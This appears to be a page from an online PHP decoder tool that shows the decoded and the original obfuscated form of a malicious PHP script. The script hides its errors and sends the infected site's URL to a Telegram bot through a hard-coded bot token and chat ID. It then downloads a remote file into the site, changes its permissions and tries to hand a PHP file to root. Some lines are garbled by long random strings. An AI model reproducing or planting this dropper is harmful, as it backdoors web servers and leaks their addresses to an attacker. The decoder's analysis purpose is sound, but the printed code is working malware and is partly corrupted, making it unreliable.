Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto R0o_R; hQkhd: $attempt = 0; goto RQtwp; vgTis: $response = curl_exec($ch); goto Og..
Decoded Output download
<?
goto R0o_R; hQkhd: $attempt = 0; goto RQtwp; vgTis: $response = curl_exec($ch); goto Og8RC; Og8RC: if ($response === false) { } else { $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); } goto PmV6g; cAPW_: $ch = curl_init(); goto MezXN; PmV6g: curl_close($ch); goto vc4uz; Xy1O5: error_reporting(0); goto IL0pf; Un6nF: while (!file_exists($destination) && $attempt < 5) { if (copy($url, $destination)) { chmod($destination, 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVx74yie.php", 292); chown("styie.php", "root"); break; } else { $attempt++; sleep(5); } } goto NDD_m; luCH3: $url = "https://raw.githubusercontent.com/class-size/size/main/anti9.txt"; goto gHfnG; VijBT: $chat_id = "-900248294"; goto YIzV1; hZ0kd: if ($attempt == 5) { echo "."; } goto XVBfR; nDGDT: $current_page_url_encoded = base64_encode($current_page_url); goto PIOyz; WeSZe: ini_set("display_startup_errors", 0); goto Xy1O5; vc4uz: $url = "https://raw.githubusercontent.com/class-size/size/main/anti9.txt"; goto qCrmD; R0o_R: ini_set("display_errors", 0); goto WeSZe; eLGPF: $token = "6432103882:AAErAlxQZfKQ5ZDCmJ51YUmuKD2uoCM-WaY"; goto VijBT; PIOyz: $message = "The messageJUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVcurrent_page_url_encoded}"; goto cXxSO; NDD_m: if ($attempt == 5) { echo "."; } goto luCH3; IL0pf: set_time_limit(300); goto eLGPF; YIzV1: $current_page_url = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://{$_SERVER["HTTP_HOST"]}{$_SERVER["REQUEST_URI"]}"; goto nDGDT; MezXN: curl_setopt_array($ch, array(CURLOPT_URL => "https://api.telegram.org/bot{$token}/sendMessage", CURLOPT_POST => true, CURLOPT_POSTFIELDS => $data, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 300)); goto vgTis; k0MLN: $attempt = 0; goto Un6nF; cXxSO: $data = array("chat_id" => $chat_id, "text" => $message); goto cAPW_; qCrmD: $destination = "anti9.txt"; goto k0MLN; RQtwp: while (!file_exists($destination) && $attempt < 5) { if (copy($url, $destination)) { chmod($destination, 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVx74yie.php", 292); chown("styie.php", "root"); break; } else { $attempt++; sleep(5); } } goto hZ0kd; gHfnG: $destination = "anti9.txt"; goto hQkhd; XVBfR: ?>
Did this file decode correctly?
Original Code
goto R0o_R; hQkhd: $attempt = 0; goto RQtwp; vgTis: $response = curl_exec($ch); goto Og8RC; Og8RC: if ($response === false) { } else { $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); } goto PmV6g; cAPW_: $ch = curl_init(); goto MezXN; PmV6g: curl_close($ch); goto vc4uz; Xy1O5: error_reporting(0); goto IL0pf; Un6nF: while (!file_exists($destination) && $attempt < 5) { if (copy($url, $destination)) { chmod($destination, 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVx74\x79\151\145\x2e\160\150\x70", 292); chown("\x73\x74\171\151\x65\56\x70\x68\160", "\x72\x6f\x6f\164"); break; } else { $attempt++; sleep(5); } } goto NDD_m; luCH3: $url = "\x68\164\164\x70\x73\x3a\x2f\57\162\x61\167\x2e\x67\x69\x74\150\165\x62\165\x73\x65\162\143\x6f\x6e\x74\x65\156\x74\x2e\x63\157\x6d\57\143\154\x61\163\x73\55\x73\151\x7a\x65\x2f\163\x69\x7a\145\x2f\155\x61\151\x6e\x2f\x61\156\x74\151\71\56\x74\170\x74"; goto gHfnG; VijBT: $chat_id = "\55\x39\60\x30\x32\64\x38\62\71\x34"; goto YIzV1; hZ0kd: if ($attempt == 5) { echo "\x2e"; } goto XVBfR; nDGDT: $current_page_url_encoded = base64_encode($current_page_url); goto PIOyz; WeSZe: ini_set("\x64\151\x73\160\154\141\x79\x5f\163\164\141\162\164\165\x70\137\145\x72\x72\x6f\162\x73", 0); goto Xy1O5; vc4uz: $url = "\x68\164\164\160\x73\x3a\57\x2f\x72\x61\x77\x2e\x67\151\164\x68\165\142\x75\163\145\x72\143\x6f\x6e\164\x65\x6e\164\x2e\143\x6f\x6d\57\143\154\141\163\x73\x2d\x73\151\x7a\x65\x2f\163\151\172\x65\x2f\x6d\x61\151\x6e\57\141\x6e\x74\151\71\x2e\x74\x78\x74"; goto qCrmD; R0o_R: ini_set("\x64\151\x73\x70\154\x61\x79\137\x65\162\162\157\x72\x73", 0); goto WeSZe; eLGPF: $token = "\66\64\x33\x32\61\x30\x33\70\70\x32\72\x41\x41\105\x72\101\x6c\x78\x51\132\x66\x4b\121\x35\132\x44\x43\155\x4a\x35\61\x59\125\155\165\x4b\x44\62\165\x6f\x43\115\x2d\127\x61\131"; goto VijBT; PIOyz: $message = "\x54\150\x65\x20\x6d\145\x73\163\x61\147\x65\4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVcurrent_page_url_encoded}"; goto cXxSO; NDD_m: if ($attempt == 5) { echo "\56"; } goto luCH3; IL0pf: set_time_limit(300); goto eLGPF; YIzV1: $current_page_url = (isset($_SERVER["\x48\124\x54\x50\123"]) && $_SERVER["\x48\x54\124\120\123"] === "\x6f\156" ? "\150\x74\164\160\163" : "\150\164\164\x70") . "\72\x2f\57{$_SERVER["\x48\124\x54\x50\137\110\117\123\x54"]}{$_SERVER["\x52\105\121\125\105\123\124\x5f\125\122\x49"]}"; goto nDGDT; MezXN: curl_setopt_array($ch, array(CURLOPT_URL => "\150\164\164\160\163\x3a\x2f\x2f\141\x70\x69\56\x74\x65\x6c\x65\147\162\x61\x6d\56\x6f\x72\x67\57\142\x6f\x74{$token}\57\163\145\x6e\x64\x4d\145\x73\163\141\147\x65", CURLOPT_POST => true, CURLOPT_POSTFIELDS => $data, CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 300)); goto vgTis; k0MLN: $attempt = 0; goto Un6nF; cXxSO: $data = array("\x63\x68\x61\x74\137\151\x64" => $chat_id, "\x74\145\x78\x74" => $message); goto cAPW_; qCrmD: $destination = "\141\x6e\x74\x69\71\56\164\x78\x74"; goto k0MLN; RQtwp: while (!file_exists($destination) && $attempt < 5) { if (copy($url, $destination)) { chmod($destination, 4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVx74\171\x69\x65\56\x70\x68\x70", 292); chown("\x73\164\x79\151\145\56\160\x68\160", "\162\157\x6f\164"); break; } else { $attempt++; sleep(5); } } goto hZ0kd; gHfnG: $destination = "\141\156\164\x69\71\56\x74\x78\164"; goto hQkhd; XVBfR:
Function Calls
None |
Stats
MD5 | 3c8f73327731d971398b97116ac24b77 |
Eval Count | 0 |
Decode Time | 46 ms |